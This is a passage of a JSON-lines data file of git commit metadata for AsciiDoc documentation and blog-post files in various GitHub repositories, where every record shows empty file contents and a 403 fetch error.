arch,mmaracic\/elasticsearch,coding0011\/elasticsearch,dongjoon-hyun\/elasticsearch,AndreKR\/elasticsearch,robin13\/elasticsearch,yanjunh\/elasticsearch,awislowski\/elasticsearch,IanvsPoplicola\/elasticsearch,ZTE-PaaS\/elasticsearch,kalimatas\/elasticsearch,gfyoung\/elasticsearch,strapdata\/elassandra5-rc,artnowo\/elasticsearch,bawse\/elasticsearch,palecur\/elasticsearch,JSCooke\/elasticsearch,mortonsykes\/elasticsearch,sreeramjayan\/elasticsearch,AndreKR\/elasticsearch,wenpos\/elasticsearch,nilabhsagar\/elasticsearch,alexshadow007\/elasticsearch,shreejay\/elasticsearch,i-am-Nathan\/elasticsearch,jprante\/elasticsearch,markharwood\/elasticsearch,rhoml\/elasticsearch,GlenRSmith\/elasticsearch,liweinan0423\/elasticsearch,Helen-Zhao\/elasticsearch,yynil\/elasticsearch,palecur\/elasticsearch,gmarz\/elasticsearch,cwurm\/elasticsearch,gingerwizard\/elasticsearch,episerver\/elasticsearch,brandonkearby\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,scottsom\/elasticsearch,vroyer\/elasticassandra,jchampion\/elasticsearch,snikch\/elasticsearch,zkidkid\/elasticsearch,markharwood\/elasticsearch,davidvgalbraith\/elasticsearch,wuranbo\/elasticsearch,obourgain\/elasticsearch,Shepard1212\/elasticsearch,a2lin\/elasticsearch,njlawton\/elasticsearch,avikurapati\/elasticsearch,shreejay\/elasticse
arch,episerver\/elasticsearch,s1monw\/elasticsearch,Helen-Zhao\/elasticsearch,winstonewert\/elasticsearch,andrejserafim\/elasticsearch,brandonkearby\/elasticsearch,elasticdog\/elasticsearch,liweinan0423\/elasticsearch,zkidkid\/elasticsearch,bawse\/elasticsearch,gfyoung\/elasticsearch,jchampion\/elasticsearch,Shepard1212\/elasticsearch,bawse\/elasticsearch,henakamaMSFT\/elasticsearch,avikurapati\/elasticsearch,markharwood\/elasticsearch,camilojd\/elasticsearch,avikurapati\/elasticsearch,JackyMai\/elasticsearch,njlawton\/elasticsearch,umeshdangat\/elasticsearch,gingerwizard\/elasticsearch,artnowo\/elasticsearch,mohit\/elasticsearch,strapdata\/elassandra5-rc,vroyer\/elassandra,rlugojr\/elasticsearch,yanjunh\/elasticsearch,C-Bish\/elasticsearch,markwalkom\/elasticsearch,njlawton\/elasticsearch,mortonsykes\/elasticsearch,xuzha\/elasticsearch,naveenhooda2000\/elasticsearch,snikch\/elasticsearch,MaineC\/elasticsearch,rajanm\/elasticsearch,markwalkom\/elasticsearch,JervyShi\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,zkidkid\/elasticsearch,mapr\/elasticsearch,lks21c\/elasticsearch,camilojd\/elasticsearch,lks21c\/elasticsearch,shreejay\/elasticsearch,AndreKR\/elasticsearch,StefanGor\/elasticsearch,scottsom\/elasticsearch,mikemccand\/elasticsearch,henakamaMSFT\/elasticsearch,ivansun1010\/elasticsearch,umeshdangat\/elasticsearch,vroyer\/elassandra,clintongormley\/elasticsearch,IanvsPoplicola\/elasticsearch,naveenhooda2000\/elasticsearch,lks21c\/elasticsearch,nazarewk\/elasticsearch,markwalkom\/elasticsearch,diendt\/elasticsearch,ivansun1010\/elasticsearch,rhoml\/elasticsearch,njlawton\/elasticsearch,jimczi\/elasticsearch,episerver\/elasticsearch,fforbeck\/elasticsearch,kaneshin\/elasticsearch,nomoa\/elasticsearch,rmuir\/elasticsearch,spiegela\/elasticsearch,ivansun1010\/elasticsearch,polyfractal\/elasticsearch,jchampion\/elasticsearch,MisterAndersen\/elasticsearch,coding0011\/elasticsearch,geidies\/elasticsearch,mjason3\/elasticsearch,LeoYao\/elasticsearch,F0lha\/elasticsearch,obourgain\/elasticsearch,elasticdog\/elasticsearch,brandonkearby\/elasticsearch,rmuir\/elasticsearch,elasticdog\/elasticsearch,bawse\/elasticsearch,dpursehouse\/elasticsearch,winstonewert\/elasticsearch,rmuir\/elasticsearch,JervyShi\/elasticsearch,nilabhsagar\/elasticsearch,MaineC\/elasticsearch,markharwood\/elasticsearch,strapdata\/elassandra,dongjoon-hyun\/elasticsearch,sneivandt\/elasticsearch,mjason3\/elasticsearch,rmuir\/elasticsearch,markharwood\/elasticsearch,uschindler\/elasticsearch,mapr\/elasticsearch,martinstuga\/elasticsearch,davidvgalbraith\/elasticsearch,scorpionvicky\/elasticsearch,ivansun1010\/elasticsearch,masaruh\/elasticsearch,gingerwizard\/elasticsearch,rlugojr\/elasticsearch,jchampion\/elasticsearch,polyfractal\/elasticsearch,JSCooke\/elasticsearch,nomoa\/elasticsearch,LewayneNaidoo\/elasticsearch,markwalkom\/elasticsearch,IanvsPoplicola\/elasticsearch,dpursehouse\/elasticsearch,robin13\/elasticsearch,kalimatas\/elasticsearch,sneivandt\/elasticsearch,xuzha\/elasticsearch,polyfractal\/elasticsearch,rajanm\/elasticsearch,ZTE-PaaS\/elasticsearch,pozhidaevak\/elasticsearch,GlenRSmith\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,awislowski\/elasticsearch,nezirus\/elasticsearch,davidvgalbraith\/elasticsearch,kaneshin\/elasticsearch,spiegela\/elasticsearch,mapr\/elasticsearch,maddin2016\/elasticsearch,s1monw\/elasticsearch,ZTE-PaaS\/elasticsearch,martinstuga\/elasticsearch,nomoa\/elasticsearch,F0lha\/elasticsearch,MisterAndersen\/elasticsearch,snikch\/elasticsearch,C-Bish\/elasticsearch,nezirus\/elasticsearc
h,MisterAndersen\/elasticsearch,fernandozhu\/elasticsearch,wangtuo\/elasticsearch,JSCooke\/elasticsearch,Helen-Zhao\/elasticsearch,liweinan0423\/elasticsearch,camilojd\/elasticsearch,brandonkearby\/elasticsearch,mohit\/elasticsearch,gingerwizard\/elasticsearch,clintongormley\/elasticsearch,wuranbo\/elasticsearch,LeoYao\/elasticsearch,JSCooke\/elasticsearch,gfyoung\/elasticsearch,mjason3\/elasticsearch,andrejserafim\/elasticsearch,mohit\/elasticsearch,martinstuga\/elasticsearch,JervyShi\/elasticsearch,andrejserafim\/elasticsearch,rlugojr\/elasticsearch,wangtuo\/elasticsearch,wangtuo\/elasticsearch,yynil\/elasticsearch,LewayneNaidoo\/elasticsearch,nknize\/elasticsearch,a2lin\/elasticsearch,ricardocerq\/elasticsearch,robin13\/elasticsearch,fred84\/elasticsearch,mikemccand\/elasticsearch,clintongormley\/elasticsearch,awislowski\/elasticsearch,episerver\/elasticsearch,robin13\/elasticsearch,C-Bish\/elasticsearch,LewayneNaidoo\/elasticsearch,jprante\/elasticsearch,nazarewk\/elasticsearch,yynil\/elasticsearch,i-am-Nathan\/elasticsearch,jchampion\/elasticsearch,vroyer\/elasticassandra,wenpos\/elasticsearch,pozhidaevak\/elasticsearch,spiegela\/elasticsearch,maddin2016\/elasticsearch,jimczi\/elasticsearch,jimczi\/elasticsearch,C-Bish\/elasticsearch,mmaracic\/elasticsearch,davidvgalbraith\/elasticsearch,sreeramjayan\/elasticsearch,Helen-Zhao\/elasticsearch,davidvgalbraith\/elasticsearch,JervyShi\/elasticsearch,LeoYao\/elasticsearch,mikemccand\/elasticsearch,s1monw\/elasticsearch,sreeramjayan\/elasticsearch,lks21c\/elasticsearch,jbertouch\/elasticsearch,MisterAndersen\/elasticsearch,shreejay\/elasticsearch,jprante\/elasticsearch,diendt\/elasticsearch,jpountz\/elasticsearch,trangvh\/elasticsearch,nknize\/elasticsearch,martinstuga\/elasticsearch,myelin\/elasticsearch,girirajsharma\/elasticsearch,andrejserafim\/elasticsearch,strapdata\/elassandra,clintongormley\/elasticsearch,jchampion\/elasticsearch,yynil\/elasticsearch,palecur\/elasticsearch,F0lha\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,F0lha\/elasticsearch,artnowo\/elasticsearch,xuzha\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,fred84\/elasticsearch,jpountz\/elasticsearch,scottsom\/elasticsearch,Shepard1212\/elasticsearch,cwurm\/elasticsearch,wangtuo\/elasticsearch,ivansun1010\/elasticsearch,qwerty4030\/elasticsearch,fernandozhu\/elasticsearch,nilabhsagar\/elasticsearch,henakamaMSFT\/elasticsearch,dongjoon-hyun\/elasticsearch,spiegela\/elasticsearch,strapdata\/elassandra5-rc,MaineC\/elasticsearch,LewayneNaidoo\/elasticsearch,glefloch\/elasticsearch,LeoYao\/elasticsearch,henakamaMSFT\/elasticsearch,mjason3\/elasticsearch,a2lin\/elasticsearch,ESamir\/elasticsearch,scorpionvicky\/elasticsearch,jprante\/elasticsearch,martinstuga\/elasticsearch,geidies\/elasticsearch,jbertouch\/elasticsearch,elasticdog\/elasticsearch,coding0011\/elasticsearch,alexshadow007\/elasticsearch,jpountz\/elasticsearch,C-Bish\/elasticsearch,StefanGor\/elasticsearch,wangtuo\/elasticsearch,markwalkom\/elasticsearch,Stacey-Gammon\/elasticsearch,LewayneNaidoo\/elasticsearch,tebriel\/elasticsearch,zkidkid\/elasticsearch,nazarewk\/elasticsearch,ricardocerq\/elasticsearch,xuzha\/elasticsearch,rajanm\/elasticsearch,a2lin\/elasticsearch,vroyer\/elasticassandra,yanjunh\/elasticsearch,qwerty4030\/elasticsearch,glefloch\/elasticsearch,spiegela\/elasticsearch,s1monw\/elasticsearch,wuranbo\/elasticsearch,ZTE-PaaS\/elasticsearch,nilabhsagar\/elasticsearch,palecur\/elasticsearch,geidies\/elasticsearch,girirajsharma\/elasticsearch,F0lha\/elasticsearch,alexshadow007\/elasti
csearch,tebriel\/elasticsearch,kaneshin\/elasticsearch,fred84\/elasticsearch,LeoYao\/elasticsearch,fforbeck\/elasticsearch,umeshdangat\/elasticsearch,fred84\/elasticsearch,strapdata\/elassandra5-rc,myelin\/elasticsearch,Stacey-Gammon\/elasticsearch,mortonsykes\/elasticsearch,Helen-Zhao\/elasticsearch,AndreKR\/elasticsearch,diendt\/elasticsearch,jpountz\/elasticsearch,gingerwizard\/elasticsearch,liweinan0423\/elasticsearch,liweinan0423\/elasticsearch,yanjunh\/elasticsearch,scottsom\/elasticsearch,gmarz\/elasticsearch,scorpionvicky\/elasticsearch,StefanGor\/elasticsearch,bawse\/elasticsearch,jbertouch\/elasticsearch,fred84\/elasticsearch,yanjunh\/elasticsearch,snikch\/elasticsearch,geidies\/elasticsearch,mikemccand\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,mapr\/elasticsearch,rhoml\/elasticsearch,masaruh\/elasticsearch,Shepard1212\/elasticsearch,camilojd\/elasticsearch,gmarz\/elasticsearch,winstonewert\/elasticsearch,jbertouch\/elasticsearch,dpursehouse\/elasticsearch,strapdata\/elassandra,mmaracic\/elasticsearch,uschindler\/elasticsearch,MaineC\/elasticsearch,naveenhooda2000\/elasticsearch,MisterAndersen\/elasticsearch,s1monw\/elasticsearch,kaneshin\/elasticsearch,diendt\/elasticsearch,clintongormley\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mmaracic\/elasticsearch,coding0011\/elasticsearch,wuranbo\/elasticsearch,nomoa\/elasticsearch,cwurm\/elasticsearch,camilojd\/elasticsearch,mmaracic\/elasticsearch,gmarz\/elasticsearch,gingerwizard\/elasticsearch,obourgain\/elasticsearch,nazarewk\/elasticsearch,ESamir\/elasticsearch,fernandozhu\/elasticsearch,JackyMai\/elasticsearch,ESamir\/elasticsearch,glefloch\/elasticsearch,nazarewk\/elasticsearch,naveenhooda2000\/elasticsearch,qwerty4030\/elasticsearch,clintongormley\/elasticsearch,lks21c\/elasticsearch,IanvsPoplicola\/elasticsearch,camilojd\/elasticsearch,pozhidaevak\/elasticsearch,sreeramjayan\/elasticsearch,HonzaKral\/elasticsearch,andrejserafim\/elasticsearch,elasticdog\/elasticsearch,maddin2016\/elasticsearch,palecur\/elasticsearch,naveenhooda2000\/elasticsearch,trangvh\/elasticsearch,jimczi\/elasticsearch,i-am-Nathan\/elasticsearch,obourgain\/elasticsearch,GlenRSmith\/elasticsearch,rhoml\/elasticsearch,dpursehouse\/elasticsearch,episerver\/elasticsearch,rajanm\/elasticsearch,polyfractal\/elasticsearch,umeshdangat\/elasticsearch,qwerty4030\/elasticsearch,MaineC\/elasticsearch,ricardocerq\/elasticsearch,diendt\/elasticsearch,umeshdangat\/elasticsearch,glefloch\/elasticsearch,markharwood\/elasticsearch,kalimatas\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,uschindler\/elasticsearch,diendt\/elasticsearch,strapdata\/elassandra,jprante\/elasticsearch,rmuir\/elasticsearch,shreejay\/elasticsearch,JackyMai\/elasticsearch,mjason3\/elasticsearch,fforbeck\/elasticsearch,ricardocerq\/elasticsearch,awislowski\/elasticsearch,trangvh\/elasticsearch,girirajsharma\/elasticsearch,winstonewert\/elasticsearch,polyfractal\/elasticsearch,nezirus\/elasticsearch,kaneshin\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nezirus\/elasticsearch,IanvsPoplicola\/elasticsearch,girirajsharma\/elasticsearch,alexshadow007\/elasticsearch,Shepard1212\/elasticsearch,yynil\/elasticsearch,glefloch\/elasticsearch,markwalkom\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,Stacey-Gammon\/elasticsearch,strapdata\/elassandra,trangvh\/elasticsearch,dpursehouse\/elasticsearch,wenpos\/elasticsearch,trangvh\/elasticsearch,pozhidaevak\/elasticsearch,masaruh\/elasticsearch,ESamir\/elasticsearch,nknize\/elasticsearch,i-am-Nathan\/elasticsearch,sco
ttsom\/elasticsearch,nomoa\/elasticsearch,tebriel\/elasticsearch,sneivandt\/elasticsearch,winstonewert\/elasticsearch,avikurapati\/elasticsearch,JSCooke\/elasticsearch,LeoYao\/elasticsearch,maddin2016\/elasticsearch,masaruh\/elasticsearch,rhoml\/elasticsearch,nezirus\/elasticsearch,mohit\/elasticsearch,martinstuga\/elasticsearch,artnowo\/elasticsearch,kalimatas\/elasticsearch,dongjoon-hyun\/elasticsearch,a2lin\/elasticsearch,henakamaMSFT\/elasticsearch,myelin\/elasticsearch,ESamir\/elasticsearch,jimczi\/elasticsearch","old_file":"docs\/reference\/migration\/migrate_2_0\/java.asciidoc","new_file":"docs\/reference\/migration\/migrate_2_0\/java.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markwalkom\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c28c69f5d6b4abebebd7b63558188de19cd7e966","subject":"Coordindation scalability doc.","message":"Coordindation scalability doc.\n","repos":"onyx-platform\/onyx,vijaykiran\/onyx","old_file":"doc\/design\/proposals\/coordination_scalability.adoc","new_file":"doc\/design\/proposals\/coordination_scalability.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vijaykiran\/onyx.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"b311c593aac1b9fe8458fdf72a775fe08486579b","subject":"- Add table to map operators to property value types - Correct order by name to property name - Start working on an example for an event filter, still to be completed.","message":"- Add table to map operators to property value types\n- Correct order by name to property name\n- Start working on an example for an event filter, still to be completed.\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"95759ae279eedd211a094cfd9a33f95c59e42cbd","subject":"Fixing include path for demo container pom files.","message":"Fixing include path for demo container pom files.\n","repos":"woq-blended\/blended,lefou\/blended,woq-blended\/blended,lefou\/blended","old_file":"doc\/Docker.adoc","new_file":"doc\/Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lefou\/blended.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1295576cf04062ed0e45d0b0f05d97c131acb3d0","subject":"Added documentation for the models API Note: Not yet implemented","message":"Added documentation for the models API\nNote: Not yet implemented\n","repos":"npiganeau\/yep,hexya-erp\/hexya,hexya-erp\/hexya,npiganeau\/yep","old_file":"doc\/models.adoc","new_file":"doc\/models.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hexya-erp\/hexya.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dea7af374f2b6998fac95876f45d68ef3813971a","subject":"Update 2018-08-09-constructing-enviroment-for-Elasticsearch-and-Kibana.adoc","message":"Update 
2018-08-09-constructing-enviroment-for-Elasticsearch-and-Kibana.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-09-constructing-enviroment-for-Elasticsearch-and-Kibana.adoc","new_file":"_posts\/2018-08-09-constructing-enviroment-for-Elasticsearch-and-Kibana.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c7ed9d15098da774b8d92fb79aeaaf93a2cdb75","subject":"Update 2018-08-15-Looking-at-randomness-and-performance-for-hash-codes.adoc","message":"Update 2018-08-15-Looking-at-randomness-and-performance-for-hash-codes.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-08-15-Looking-at-randomness-and-performance-for-hash-codes.adoc","new_file":"_posts\/2018-08-15-Looking-at-randomness-and-performance-for-hash-codes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f925a588562acac1b0ef0d0e928d489f8fe34610","subject":"Update 2016-11-11-Pepper.adoc","message":"Update 2016-11-11-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-11-11-Pepper.adoc","new_file":"_posts\/2016-11-11-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d94e23d1bce2f951620e0e6b2cc31ae4a9a3d231","subject":"Create invoicing-dry-run.adoc","message":"Create invoicing-dry-run.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/subscription\/includes\/invoicing-dry-run.adoc","new_file":"userguide\/subscription\/includes\/invoicing-dry-run.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"988a6b0b1b20d9e42f25ae339aabd41f07173c62","subject":"Update 2016-02-03-Attention-or-Retention-or-Protention.adoc","message":"Update 2016-02-03-Attention-or-Retention-or-Protention.adoc","repos":"jfavlam\/Concepts,jfavlam\/Concepts,jfavlam\/Concepts","old_file":"_posts\/2016-02-03-Attention-or-Retention-or-Protention.adoc","new_file":"_posts\/2016-02-03-Attention-or-Retention-or-Protention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jfavlam\/Concepts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bb7aa8f1891843d8aa4e3ff4fc74aaa4fb89243e","subject":"New blog post","message":"New blog 
post\n","repos":"skybon\/rigsofrods-website,skybon\/rigsofrods-website,skybon\/rigsofrods-website,skybon\/rigsofrods-website","old_file":"pregen\/source\/blog\/2015-07-07-coming-soon-new-home-page-and-wiki\/index.adoc","new_file":"pregen\/source\/blog\/2015-07-07-coming-soon-new-home-page-and-wiki\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skybon\/rigsofrods-website.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"13c7789f57ef57d7e905347a8b6cc759d16f53dd","subject":"y2b create post iPad 2 UNBOXING \\u0026 Hands On!","message":"y2b create post iPad 2 UNBOXING \\u0026 Hands On!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-03-11-iPad-2-UNBOXING-u0026-Hands-On.adoc","new_file":"_posts\/2011-03-11-iPad-2-UNBOXING-u0026-Hands-On.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b939d74e9853608988bb7af8db4e6d032ab35ba","subject":"Update 2015-04-21-How-to-Transparent-NavigationBar.adoc","message":"Update 2015-04-21-How-to-Transparent-NavigationBar.adoc","repos":"J0HDev\/blog,J0HDev\/blog,J0HDev\/blog","old_file":"_posts\/2015-04-21-How-to-Transparent-NavigationBar.adoc","new_file":"_posts\/2015-04-21-How-to-Transparent-NavigationBar.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/J0HDev\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1aa83674ce0ce64e097a62fc4aebbce6f3dc94b6","subject":"Update 2018-03-06-Creating-a-custom-select-element.adoc","message":"Update 2018-03-06-Creating-a-custom-select-element.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2018-03-06-Creating-a-custom-select-element.adoc","new_file":"_posts\/2018-03-06-Creating-a-custom-select-element.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df0a2757020667d6cab1e81328e9f8ac63c2d34a","subject":"Update 2017-05-06-Migrate-Images-to-Sonata-Media.adoc","message":"Update 2017-05-06-Migrate-Images-to-Sonata-Media.adoc","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-06-Migrate-Images-to-Sonata-Media.adoc","new_file":"_posts\/2017-05-06-Migrate-Images-to-Sonata-Media.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c94a8150c0b323493f90d04a5d0774f6f67b5cf","subject":"Update 2008-08-17-Meu-primeiro-site-hacked.adoc","message":"Update 
2008-08-17-Meu-primeiro-site-hacked.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/2008-08-17-Meu-primeiro-site-hacked.adoc","new_file":"_posts\/2008-08-17-Meu-primeiro-site-hacked.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45e03d7e883f33e1eb0b6b6fd9702c3cf4375475","subject":"y2b create post 3DS Case Giveaway WINNER!","message":"y2b create post 3DS Case Giveaway WINNER!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-05-05-3DS-Case-Giveaway-WINNER.adoc","new_file":"_posts\/2011-05-05-3DS-Case-Giveaway-WINNER.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1644fd2adca780a6ed0ab69532401d296cb395fc","subject":"Update 2016-05-19-Backporting-Ubuntu-packages-C-Make.adoc","message":"Update 2016-05-19-Backporting-Ubuntu-packages-C-Make.adoc","repos":"codechunks\/codechunks.github.io,codechunks\/codechunks.github.io,codechunks\/codechunks.github.io,codechunks\/codechunks.github.io","old_file":"_posts\/2016-05-19-Backporting-Ubuntu-packages-C-Make.adoc","new_file":"_posts\/2016-05-19-Backporting-Ubuntu-packages-C-Make.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/codechunks\/codechunks.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c7b14826b14b9dfeb647c3cd4519de81e940077","subject":"Update 2017-12-03-visual-studio-code-extension.adoc","message":"Update 2017-12-03-visual-studio-code-extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-03-visual-studio-code-extension.adoc","new_file":"_posts\/2017-12-03-visual-studio-code-extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4e1b110066efce93a5caece52288684934ae328c","subject":"Announcement for 1.7.0.Alpha1","message":"Announcement for 1.7.0.Alpha1\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"_posts\/2021-08-02-debezium-1-7-alpha1-released.adoc","new_file":"_posts\/2021-08-02-debezium-1-7-alpha1-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cfd628903a3934d0942f253658d29c507b47f691","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 
2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a01d1e25758eec16c116fc5874d4b3cbfee231b3","subject":"Update 2016-07-22-Stable-Graph-Matching.adoc","message":"Update 2016-07-22-Stable-Graph-Matching.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_file":"_posts\/2016-07-22-Stable-Graph-Matching.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c67c9ef9bce928772940f1273551d9beeaa26f39","subject":"[examples] add readme to webserver example","message":"[examples] add readme to webserver example\n","repos":"GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold,GoogleContainerTools\/skaffold","old_file":"examples\/webserver\/README.adoc","new_file":"examples\/webserver\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/GoogleContainerTools\/skaffold.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0bddbf6fe48415e67a5d5e78f0158cb977b78faf","subject":"Update 2018-06-10-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P.adoc","message":"Update 2018-06-10-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-10-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P.adoc","new_file":"_posts\/2018-06-10-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-H-S-R-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13628761cc52ee6f7ec88a881dd03d8089d695b8","subject":"Update 2016-03-29-Python.adoc","message":"Update 